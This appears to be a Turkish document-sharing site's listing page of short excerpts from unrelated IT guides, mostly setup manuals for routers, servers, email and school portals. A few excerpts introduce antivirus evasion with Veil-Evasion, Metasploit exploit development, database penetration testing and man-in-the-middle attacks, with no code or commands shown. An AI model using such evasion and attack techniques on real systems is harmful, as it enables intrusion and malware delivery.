VKV Koç Özel İlkokulu, Ortaokulu ve Lisesi. K12Net Veli Yardım Kılavuzu VKV Koç Özel İlkokulu, Ortaokulu ve Lisesi KNet Veli Yardım Kılavuzu KNet e Erişim KNet Erişim Bilgilerini Güncelleme KNet te Öğrenci Bilgilerini Görüntüleme KNet Ekran Ara Yüzünü Özelleştirme KNet te

Detaylı

Disk tabanlı bir çözümdür ve bu yapısından dolayı kullanılması kolaydır. Ayrıca hızlı bir şekilde yedekleme ve geri dönüş sağlar.

Disk tabanlı bir çözümdür ve bu yapısından dolayı kullanılması kolaydır. Ayrıca hızlı bir şekilde yedekleme ve geri dönüş sağlar. VMware Data Recovery Yapılandırılması VMware Data Recovery, VMware vsphere için geliştirilmiş yeni bir yedekleme ve geri dönüş (backup / restore) uygulamasıdır. VMware Data Recovery sanal platformdaki

Detaylı

Anti-Virüs Atlatma 2. Kurulum

Anti-Virüs Atlatma 2. Kurulum Anti-Virüs Atlatma 2 Merhaba, bu yazımızda işleyeceğimiz araç Veil-evasion dur. Veil, açık kaynak kodlu olarak geliştirilen bir framework tür. Biz Veil framework içerisindeki anti-virüs atlatma aracı olan

Detaylı

"SQL Server Management Studio" yazılımını yüklemek için alttaki resmi sitesinden 180 günlük deneme sürümünü indirebilirsiniz.

SQL Server Management Studio yazılımını yüklemek için alttaki resmi sitesinden 180 günlük deneme sürümünü indirebilirsiniz. Microsoft SQL Server 2008 R2 Kurulumu "SQL Server Management Studio" yazılımını yüklemek için alttaki resmi sitesinden 180 günlük deneme sürümünü indirebilirsiniz. http://www.microsoft.com/sqlserver/en/us/get-sql-server/try-it.aspx

Detaylı

Anti-Virüs Atlatma 1. Resimden anlaşıldığı üzere 56 anti-virüs yazılımından 36 tanesi zararlı yazılım olduğunu doğrulamıştır.

Anti-Virüs Atlatma 1. Resimden anlaşıldığı üzere 56 anti-virüs yazılımından 36 tanesi zararlı yazılım olduğunu doğrulamıştır. Anti-Virüs Atlatma 1 Merhaba, Anti-virüs bypass işlemleri sırasında kullanılan araçların anlatılmasını içerecek olan bu makale, yazı dizisi şeklinde olacaktır. Her yazıda farklı bir anti-virüs bypass aracı

Detaylı

http://www.microsoft.com/visualstudio/eng/downloads

http://www.microsoft.com/visualstudio/eng/downloads Visual Studio 2012'nin kurulumunu, Visual Studio'nun kullanımını ve Windows Store'da basit bir proje hazırlanmasını anlatacağım. Hepsinden önce Visual Studio ortamından biraz bahsedelim. Visual Studio

Detaylı

www.airties.com 7/24 destek hattı 444 0 239 Kolay kurulum CD si Üç yıl garanti Üç yıl garanti YM.WR.5341.UM.TR.D01REV07062011

www.airties.com 7/24 destek hattı 444 0 239 Kolay kurulum CD si Üç yıl garanti Üç yıl garanti YM.WR.5341.UM.TR.D01REV07062011 www.airties.com Kolay kurulum CD si Üç yıl garanti 7/24 destek hattı 444 0 239 7/24 destek hattı 444 0 239 Üç yıl garanti YM.WR.5341.UM.TR.D01REV07062011 Kablosuz yaşam Hızlı kurulum kılavuzu Kablosuz

Detaylı

Bu makalede 2003 sunucu, Windows 2003 Server anlamına gelmektedir. Aşağıda yapılan işlemler 2003 R2 sunucu üzerinde denenmiş ve çalıştırılmıştır.

Bu makalede 2003 sunucu, Windows 2003 Server anlamına gelmektedir. Aşağıda yapılan işlemler 2003 R2 sunucu üzerinde denenmiş ve çalıştırılmıştır. WINDOWS 2003 SUNUCULARI ÜZERĐNE PHP YÜKLENMESĐ ERDAL YAZICIOĞLU erdal(at)gmail.com http://barbarossa41.wordpress.com Merhabalar, Çözümpark.com adresinde bir kullanıcı ASP ve PHP yi aynı sunucu üzerinde

Detaylı

VIRTUALIZATION SANALLAŞTIRMA

VIRTUALIZATION SANALLAŞTIRMA VIRTUALIZATION SANALLAŞTIRMA EĞİTMEN AD SOYAD : FAHRETTİN ERDİNÇ TECRÜBE : 17 YIL OKUL : 1995 DEÜ ELK-ELKTR MÜH. BİLİMSEL AKADEMİ KİMDİR? BİLİMSEL AKADEMİ, 1996 YILINDAN BERİ EĞİTİM KONUSUNDA FAALİYET

Detaylı

PERKON PDKS Kurulum ve hızlı başlangıç rehberi

PERKON PDKS Kurulum ve hızlı başlangıç rehberi Oluşturma 02.11.2015 Revizyon: 19.01.2016 Rev. No: 03 Yazan: Süleyman FAKİR Düzenleyen: F. DELİRİ PERKON PDKS Kurulum ve hızlı başlangıç rehberi 1) PDKS Kurulumu, Lisans Onaylaması Ve Veri Tabanı Ayarları

Detaylı

MERAK MAIL SERVER ACTIVE DIRECTORY ENTEGRASYONU

MERAK MAIL SERVER ACTIVE DIRECTORY ENTEGRASYONU MERAK MAIL SERVER ACTIVE DIRECTORY ENTEGRASYONU Bir domain ortamındaki kullanıcıların aynı kullanıcı adı ve parola bilgisiyle merak mail server içerisine entegre edilmesi için domain controller ve merak

Detaylı

ACS790 Programından OZW672 Web Server a tesis diyagramının aktarılması

ACS790 Programından OZW672 Web Server a tesis diyagramının aktarılması ACS790 Programından OZW672 Web Server a tesis diyagramının aktarılması 1. OCI 700 servis aracını RVS serisi kontrol cihazı kullanıyorsanız sol taraftaki resimde görüldüğü gibi BSB soketine, LMS kazan kontrol

Detaylı

WEB E-POSTA AYARLARI. Outlook 2003 Ayarı ( Resimli Anlatım )

WEB E-POSTA AYARLARI. Outlook 2003 Ayarı ( Resimli Anlatım ) WEB E-POSTA AYARLARI Outlook 2003 Ayarı Outlook 2007 Ayarı Outlook 2010 Ayarı Gmail Ayarı Hotmail Ayarı Tüm Ayarlar İçin Gelen posta sunucusu (POP3) ve giden posta sunucusu (SMTP) ye bnposta.bingol.edu.tr

Detaylı

UZAKTAN EĞİTİM SİSTEM KULLANIM REHBERİ

UZAKTAN EĞİTİM SİSTEM KULLANIM REHBERİ UZAKTAN EĞİTİM SİSTEM KULLANIM REHBERİ (Öğrenciler için) Bartın Üniversitesi Uzaktan Eğitim Uygulama ve Araştırma Merkezi ÖĞRENME YÖNETİM SİSTEMİNE GİRİŞ Uzaktan eğitim öğrenme yönetim sistemine web ortamından

Detaylı

Erişim Noktası Ayarları

Erişim Noktası Ayarları Erişim Noktası Ayarları Değerli Müşterimiz, Cihazınızı erişim noktası cihazı olarak kullanabilmek için aşağıdaki adımları takip etmeniz gerekmektedir. Statik IP Tanımlama AirTies Kablosuz Erişim Noktası

Detaylı

MyEnglishLab Online Kayıt Kılavuzu 2011

MyEnglishLab Online Kayıt Kılavuzu  2011 MyEnglishLab Online Kayıt Kılavuzu www.myenglishlab.com 2011 Kayıt işlemine başlamak için sayfada yer alan Register butonuna tıklayınız. Satın aldığınız ürünümüzün yanında bulunan Register / Login butonuna

Detaylı

Moodle, herkes tarafından (öğretmen, öğrenci) kolay şekilde kullanılabilmektedir.

Moodle, herkes tarafından (öğretmen, öğrenci) kolay şekilde kullanılabilmektedir. MOODLE NEDİR? Moodle, özgür ve açık kaynak kodlu bir uzaktan eğitim sistemidir. Açılımı, Modular-Object-Oriented- Dynamic-Learning-Environment yani Esnek Nesne Yönelimli Dinamik Öğrenme Ortamı olarak çevrilebilir.

Detaylı

HUAWEI Cihazlara Erişim Yöntemleri

HUAWEI Cihazlara Erişim Yöntemleri HUAWEI Cihazlara Erişim Yöntemleri 24/06/2013 GİRİŞ Bir Huawei cihaza nasıl erişiriz sorusuna cevap vermek için, öncelikle belirlenmesi gereken, cihaz üzerinde ne yapılmak istendiğidir. Cihaza bir dosya

Detaylı

1. Hafta MS SQL Server 2008 Kurulum ve Tanıtımı BPR255 Veritabanı. Bu Derste Öğrenecekleriniz: Kurulum:

1. Hafta MS SQL Server 2008 Kurulum ve Tanıtımı BPR255 Veritabanı. Bu Derste Öğrenecekleriniz: Kurulum: Bu Derste Öğrenecekleriniz: 1- MS SQL Server 2008 Kurulumu ve Tanıtımı 2- Komut Kullanarak Veritabanı Oluşturma ve Silme 3- SQL Yazım Kuralları Kurulum: Sistem gereksinimleri: Desteklenen işletim sistemleri:

Detaylı

Veritabanı Sızma Testleri Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

Veritabanı Sızma Testleri Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı Veritabanı Sızma Testleri Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı Tarih 1 Veritabanı Sızma Testleri Veritabanı sistemleri kritik sistemlerdir. Testler sonucunda elde

Detaylı

CELAL BAYAR ÜNİVERSİTESİ KÜTÜPHANE VERİTABANLARINA ÜNİVERSİTE DIŞINDAN ERİŞİM

CELAL BAYAR ÜNİVERSİTESİ KÜTÜPHANE VERİTABANLARINA ÜNİVERSİTE DIŞINDAN ERİŞİM Celal Bayar Üniversitesi kütüphane veritabanlarına üniversite dışından erişebilmek için kullandığınız internet tarayıcısına uygun olarak bazı ayarlar yapmanız gerekmektedir. Aşağıda tanımlanan ayarlar

Detaylı

AKINSOFT. Eofis NetworkAdmin. AKINSOFT EOfis NetworkAdmin Kurulumu Bilgi Notu. Doküman Versiyon : 1.01.01 Tarih : 10.01.2008. Copyright 2008 AKINSOFT

AKINSOFT. Eofis NetworkAdmin. AKINSOFT EOfis NetworkAdmin Kurulumu Bilgi Notu. Doküman Versiyon : 1.01.01 Tarih : 10.01.2008. Copyright 2008 AKINSOFT AKINSOFT EOfis NetworkAdmin Kurulumu Bilgi Notu Doküman Versiyon : 1.01.01 Tarih : 10.01.2008 1 - Çalışma Şekli Hakkında Kısa Bilgi modülü kısaca aşağıdaki işlemleri yapar. Bu özelliklerin çalışabilmesi

Detaylı

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net Metasploit Framework ile Güvenlik Denetimi Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net Sunum İçeriği Exploit Kavramı Exploit Geliştirme Süreci Bütünleşik Geliştirme Ortamları Metasploit

Detaylı

MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI

MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI HALİL DALABASMAZ PENETRATION TESTING SPECIALIST ŞUBAT 2015 BGA BİLGİ GÜVENLİĞİ LİMİTED ŞİRKETİ WWW.BGA.COM.TR İÇİNDEKİLER 1. GİRİŞ... 1 2. MICROSOFT

Detaylı

INHAND ROUTER LAR İÇİN PORT YÖNLENDİRME KILAVUZU

INHAND ROUTER LAR İÇİN PORT YÖNLENDİRME KILAVUZU INHAND ROUTER LAR İÇİN PORT YÖNLENDİRME KILAVUZU Z Telemetri Telekomünikasyon Yazılım San. Tic. LTD. ŞTI. Kavaklıdere Mah. Atatürk Bulvarı No: 151/804 Çankaya / Ankara info@ztelemetry.com Tel: +90 312

Detaylı

TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI

TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI 1 Başlarken Satın almış olduğunuz TL-WPS510U nun kullanım diagramı aşağıdaki gibidir. Cihazınızı bir ağ yazıcısı değilse veya kablolu ağ yazıcınızı kablosuz olarak

Detaylı

Windows İşletim Sistemi

Windows İşletim Sistemi Windows İşletim Sistemi Bilgisayar (Özellikler) Bilgisayarınızın özelliklerini görüntülemek için : Masaüstünde Bilgisayar simgesine sağ tıklayarak Özellikler e tıklayın. Çıkan pencerede bilgisayarınızda

Detaylı

Kurumsal Güvenlik ve Web Filtreleme

Kurumsal Güvenlik ve Web Filtreleme S a y f a 1 antikor Kurumsal Güvenlik ve Web Filtreleme SshClient, Putty v.s. S a y f a 2 S a y f a 3 Yönetici olarak AntiKor a girmek için SshClient veya Putty programı kullanılır. IP olarak kurum içinden

Detaylı

FortiGate Sertifika Yönetimi. v4.00-build0637-2013/02

FortiGate Sertifika Yönetimi. v4.00-build0637-2013/02 Sertifika Yönetimi v4.00-build0637-2013/02 0 FortiGate (Admin Web Erişimi) Sertifikalı Erişim Datasheet FortiGate Cihazında Sertifika İsteği Oluşturmak FortiGate cihazınızın web arayüzünden System > Certificates

Detaylı

Data Link Katmanı olarak adlandırılır. Fiziksel adresleme bu katmanda yapılır.

Data Link Katmanı olarak adlandırılır. Fiziksel adresleme bu katmanda yapılır. Subterfuge ile Middle Attack Man in The Man in the middle saldırıları, saldırganın hedefindeki bilgisayarla diğer bilgisayar veya bilgisayarların ağdaki tüm veri trafiğini kendi üzerine alması yoluyla

Detaylı

Kurumsal Güvenlik ve Web Filtreleme

Kurumsal Güvenlik ve Web Filtreleme S a y f a 1 antikor Kurumsal Güvenlik ve Web Filtreleme SshClient, Putty v.s. S a y f a 2 S a y f a 3 S a y f a 4 S a y f a 5 S a y f a 6 S a y f a 7 şeklini alır. Bu durumda kullanıcı yasaklı konumdadır.

Detaylı

Exchange Server 2010 Sertifika Oluşturma

Exchange Server 2010 Sertifika Oluşturma Exchange Server 2010 Sertifika Oluşturma Bildiğimiz üzere Exchange Server 2003 ve 2007 de default olarak SSL oluşturulup kullanılıyordu. Ancak bir müddet sonra sertifikanın süresi dolduğu için artık çalışmayacaktı.

Detaylı

Course Online. Güncelleme: Haziran 24, 2013

Course Online. Güncelleme: Haziran 24, 2013 Course Online Güncelleme: Haziran 24, 2013 Course Online, Campus Online ile birlikte hocaların kullanımına açık, verdikleri derslerle ilgili çeşitli değişiklikleri ve bildirimleri yapabilecekleri web tabanlı

Detaylı

WDS İle Windows XP Pro Image Alma Ve Yükleme Ilbey Ismail UNVER - MCP

WDS İle Windows XP Pro Image Alma Ve Yükleme Ilbey Ismail UNVER - MCP 1 - WDS ÖN HAZIRLIK İŞLEMLERİ Windows Deployment Services ( WDS ) daha önceden oluşturduğumuz ya da varolan bir DVD içerisinden alabileceğimiz BOOT ve INSTALL dizinlerini sunucu üzerinden dağıtan ve bu

Detaylı

ASP.NET ile Bir Web Sitesi Oluşturma

ASP.NET ile Bir Web Sitesi Oluşturma 29,30 Eylül 2011 ASP.NET ile Bir Web Sitesi Oluşturma ASP.NET sitesi oluşturmak için File menüsündeki, New açılır listesindeki, Web Site komutuna tıklıyoruz Açılan pencereden C# içindeki ASP.NET Web Site

Detaylı

TÜRKİYE NOTERLER BİRLİĞİ

TÜRKİYE NOTERLER BİRLİĞİ NOTERLİK BİLGİ SİSTEMİ Değişiklik Numarası: 1.8 11/04/2012 İÇİNDEKİLER 1 ŞEKİL LİSTESİ... 3 1 T.N.B. DUYURU SİSTEMİ... 4 2 T.N.B. DUYURU SİSTEMİ UYGULAMASI İÇİN GEREKLİLİKLER... 6 3 T.N.B. DUYURU SİSTEMİ

Detaylı

Wolvox Kapı Ekranı. AKINSOFT Wolvox Kapı Ekranı Yardım Dosyası. Doküman Versiyon : 1.02.01

Wolvox Kapı Ekranı. AKINSOFT Wolvox Kapı Ekranı Yardım Dosyası. Doküman Versiyon : 1.02.01 AKINSOFT Yardım Dosyası Doküman Versiyon : 1.02.01 Tarih : 15.11.2014 1 1. KULLANIM AMACI Personel takip sistemi kullanmak isteyen tüm işletmeler için geliştirilmiştir. WOLVOX İnsan Kaynakları programı

Detaylı

ÇANKAYA ÜNİVERSİTESİ WEBMAIL KULLANIM KLAVUZU

ÇANKAYA ÜNİVERSİTESİ WEBMAIL KULLANIM KLAVUZU ÇANKAYA ÜNİVERSİTESİ WEBMAIL KULLANIM KLAVUZU Üniversitemiz Webmail servisi yenilenmiş olup Roundcube webmail üzerinden servis vermeye başlamıştır. Daha önce kullanılan SquirrelMail servisi https://oldwebmail.cankaya.edu.tr/

Detaylı

Response : Sunucunun istemciye veri yollamasını

Response : Sunucunun istemciye veri yollamasını Response : Sunucunun istemciye veri yollamasını 27 Ekim 2011 / Perşembe Örnek : 2 tane sayfa açıyoruz,1nci ye TextBox1 ve Button ekliyoruz. Şunu istiyoruz,1nci sayfada şifre girilince, Button u tıklayınca

Detaylı

UBNT. UniFi mfi Ububntu. Ubuntu İşletim Sistemi ve UniFi/mFi Yazılımlarının Kurulumu

UBNT. UniFi mfi Ububntu. Ubuntu İşletim Sistemi ve UniFi/mFi Yazılımlarının Kurulumu UBNT UniFi mfi Ububntu Ubuntu İşletim Sistemi ve UniFi/mFi Yazılımlarının Kurulumu İlknur Duran - Net Vizyon Bilgi İşlem A.Ş. Ubiquiti Networks (UBNT) UniFi ve mfi ürün ailesinin kurulumu, konfigurasyonu

Detaylı

WORDPRESS İLE BLOG TASARLAMA REHBERİ İçindekiler

WORDPRESS İLE BLOG TASARLAMA REHBERİ İçindekiler WORDPRESS İLE BLOG TASARLAMA REHBERİ İçindekiler 1. Başlarken 2. Blogunuzu gösterme 3. Yaz ekranındandaki öğeler ve yeni kayıt ekleme 4. Resim ekleme 5. Video ekleme 6. Yeni sayfa ekleme 7. Bağlantı ekleme

Detaylı

Elektronik Belge Yönetim Sistemi Kullanım Kılavuzu

Elektronik Belge Yönetim Sistemi Kullanım Kılavuzu Elektronik Belge Yönetim Sistemi Kullanım Kılavuzu İçindekiler E-İmza PIN Kodunun Alınması...2 Windows İşletim Sisteminde Yapılması Gereken işlemler...8 Windows XP ve 7 için Sürücü Kurulumu...8 Microsoft.NET

Detaylı

Outlook Web Access'a Güvensiz Girmeyin

Outlook Web Access'a Güvensiz Girmeyin Outlook Web Access'a Güvensiz Girmeyin Maillerimize her zaman her yerden ulaşmak herkesin istediği bir konu. Bunun için mail serverların sundu çeşitli imkanlar bulunmakta. POP3 bağlantılar, Web mailler,

Detaylı

NBG416N. Kullanım Kılavuzu ve Garanti Kartı NBG416N

NBG416N. Kullanım Kılavuzu ve Garanti Kartı NBG416N NBG416N Kullanım Kılavuzu ve Garanti Kartı NBG416N Ürün Bakım ve Muhafaza Ürünü sadece orijinal adaptörü ile çalıştırınız. Ürünün kasasını hiçbir koşulda açmayınız, herhangi bir parçasını sökmeyiniz. Arıza

Detaylı

OKUL HABER EKLEME MODÜLÜ TANITIM DOSYASI. Okul haberlerinizi ilçemiz web sitesinde yayınlayabilmek için aşağıdaki adımları uygulamanız gerekmektedir.

OKUL HABER EKLEME MODÜLÜ TANITIM DOSYASI. Okul haberlerinizi ilçemiz web sitesinde yayınlayabilmek için aşağıdaki adımları uygulamanız gerekmektedir. OKUL HABER EKLEME MODÜLÜ TANITIM DOSYASI Okul haberlerinizi ilçemiz web sitesinde yayınlayabilmek için aşağıdaki adımları uygulamanız gerekmektedir. http://maltepe.meb.gov.tr/mebpanel adresine giriniz.

Detaylı

PRAGON PROTECT & RESTORE 3. Kurulum Rehberi

PRAGON PROTECT & RESTORE 3. Kurulum Rehberi PRAGON PROTECT & RESTORE 3 Kurulum Rehberi Başlangıç 1. Çeşitli metotlarla edindiğiniz kurulum dosyasını (.exe) çift tıklayarak kuruluma başlayın. 2. İlk olarak kurulum dili seçmeniz gerekiyor. İngilizce

Detaylı

Uzaktan Kurulum Kılavuzu

Uzaktan Kurulum Kılavuzu Uzaktan Kurulum Kılavuzu Uzak yönetim konsolu aracılığı ile ShadowProtect kurulumu ve yönetimi. Sürüm: 4.0+ Tarih: 30.03.2011 Copyright StorageCraft Technology Corporation 2008 Sayfa 1 / 10 ShadowProtect

Detaylı

Öğrenci Kullanım Kılavuzu

Öğrenci Kullanım Kılavuzu Öğrenci Kullanım Kılavuzu Web tabanlı ALMS adresinizden sisteminize web tarayıcınızla (Google Chrome, Internet Explorer, Mozilla, Safari vb.) giriş yapınız. Açılan sayfada gerekli alanlara TC kimlik numaranızı

Detaylı

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz. Manuel MESH Ayarları Değerli Müşterimiz, Kapsama alanını arttırmak için cihazınız ile tekrarlayıcı modunda çalışan bir ya da daha fazla AirTies Kablosuz Erişim Noktası (Access Point) cihazından oluşan

Detaylı

2. HTML Temel Etiketleri

2. HTML Temel Etiketleri 2. HTML Temel Etiketleri Bu bölümü bitirdiğinizde, HTML ve etiket kavramlarının ne olduğunu, HTML komut yapısını, Örnek bir HTML dosyasının nasıl oluşturulduğunu, Temel HTML etiketlerinin neler olduğunu,

Detaylı

WINDOWS SERVER 2008 R2 REMOTE DESKTOP SERVICES RD Connection Broker

WINDOWS SERVER 2008 R2 REMOTE DESKTOP SERVICES RD Connection Broker WINDOWS SERVER 2008 R2 REMOTE DESKTOP SERVICES RD Connection Broker Günümüzde üzerinde önemli uygulamalar çalıştıran, veritabanları barındıran ve sağladığı çeşitli servisler ile birçok konumda ve görevde

Detaylı

ETA:MOBİL KURULUM TALİMATI

ETA:MOBİL KURULUM TALİMATI ETA:MOBİL KURULUM TALİMATI ETA:Mobil Kurulum Adımları Kuruluma başlamadan önce ana bilgisayarınızda kontrol etmeniz gereken minimum gereksinimler aşağıda belirtilmiştir. 1. Microsoft Windows Versiyon Kurulum

Detaylı

UNIVERSAL REPEATER (TEKRARLAYICI/GENİŞLETİCİ MODU)

UNIVERSAL REPEATER (TEKRARLAYICI/GENİŞLETİCİ MODU) UNIVERSAL REPEATER (TEKRARLAYICI/GENİŞLETİCİ MODU) Tekrarlayıcı modu var olan bir kablosuz bağlantıyı tekrarlayarak daha uzak mesafelere genişletmek ve yaymak amacıyla kullanılır. Aşağıdaki adımları takip

Detaylı

Çerezleri (Cookie) ve Önbelleği (Cache) Temizleme

Çerezleri (Cookie) ve Önbelleği (Cache) Temizleme Çerezleri (Cookie) ve Önbelleği (Cache) Temizleme Kullandığınız tarayıcıda veya görüntülediğiniz sayfada sorun varsa, öncelikle tarayıcının önbelleğini temizlemeyi deneyin. Önbelleği temizledikten sonra

Detaylı

BitTorrent İstemci Kullanımı

BitTorrent İstemci Kullanımı BitTorrent İstemci Kullanımı Değerli Müşterimiz, BitTorrent internet üzerinden dosya paylaşım yazılımına ve aynı tekniği kullanan dosya takas sistemine verilen isimdir. Diğer eşten eşe (P2P) paylaşım programlarından

Detaylı

Temel masaüstü bileşenleri

Temel masaüstü bileşenleri Temel masaüstü bileşenleri Bu bölümde önce kısaca masaüstünün ne olduğundan, nasıl kullanılabileceğinden bahsedip, ardından da masaüstünün temel bileşenlerini anlatacağız. Masaüstü, simgeler, pencereler,

Detaylı

FOUR FAITH ROUTER LAR İLE SERİ HABERLEŞME KILAVUZU

FOUR FAITH ROUTER LAR İLE SERİ HABERLEŞME KILAVUZU FOUR FAITH ROUTER LAR İLE SERİ HABERLEŞME KILAVUZU Z Telemetri Telekomünikasyon Yazılım San. Tic. LT. ŞTI. Kavaklıdere Mah. Atatürk Bulvarı No: 151/804 Çankaya / Ankara info@ztelemetry.com Tel: +90 312

Detaylı

T.C. istanbul ÜNiVERSiTESi ÖĞRENCi BiLGi SiSTEMi. ÖĞRETiM ELEMANI KULLANIM KILAVUZU

T.C. istanbul ÜNiVERSiTESi ÖĞRENCi BiLGi SiSTEMi. ÖĞRETiM ELEMANI KULLANIM KILAVUZU T.C. istanbul ÜNiVERSiTESi ÖĞRENCi BiLGi SiSTEMi ÖĞRETiM ELEMANI KULLANIM KILAVUZU 1 1. Sisteme Giriş Nokta Üniversite Otomasyonu sistemini kullanabilmek için öncelikle Windows işletim sisteminde bulunan

Detaylı

Kaynak Kodlardan Derleme. Turquaz Muhasebe. Versiyon 0.2. Hüseyin Ergün. 26 Mart 2005

Kaynak Kodlardan Derleme. Turquaz Muhasebe. Versiyon 0.2. Hüseyin Ergün. 26 Mart 2005 Kaynak Kodlardan Derleme Turquaz Muhasebe Versiyon 0.2 Hüseyin Ergün 26 Mart 2005 Turquaz Muhasebe, Kaynak Kodları Derleme Sayfa 2 İçindekiler İÇİNDEKİLER 2 GEÇMİŞ DEĞİŞİKLİKLER 3 1. GİRİŞ 4 1.1 AÇIKLAMA

Detaylı

Windows 7 Format Atma ve Kurulumu (Resimli Anlatım)

Windows 7 Format Atma ve Kurulumu (Resimli Anlatım) www.anasayfa.xyz Kasım 1, 2015 Windows 7 Format Atma ve Kurulumu (Resimli Anlatım) by www.anasayfa.xyz Bu yazımda windows 7 format atma işlemini detaylı bir şekilde anlatacağım. Ben format işlemini tüm

Detaylı

Cyberoam Firewall Kullanıcı ve Grup Oluşturma

Cyberoam Firewall Kullanıcı ve Grup Oluşturma Cyberoam Firewall Kullanıcı ve Grup Oluşturma Cyberoam Firewall User ve Grup Oluşturma Cyberoam Firewall ile sisteminizi ve ağınızı daha iyi yönetebilmek için bir kimlik doğrulama sistemine sahip olmanız

Detaylı

e-imzatr Kurulum Klavuzu

e-imzatr Kurulum Klavuzu e-imzatr Kurulum Klavuzu Sürüm 0.0.1 1 İçindekiler İşletim Sistemi Sistem Türü Öğrenme Java yükleme Akis Kurulum Kart Okuyucu Sürücü Kurulum Kullanıcı Doğrulama 2 İşletim Sistemi Sistem Türü Öğrenme Bu

Detaylı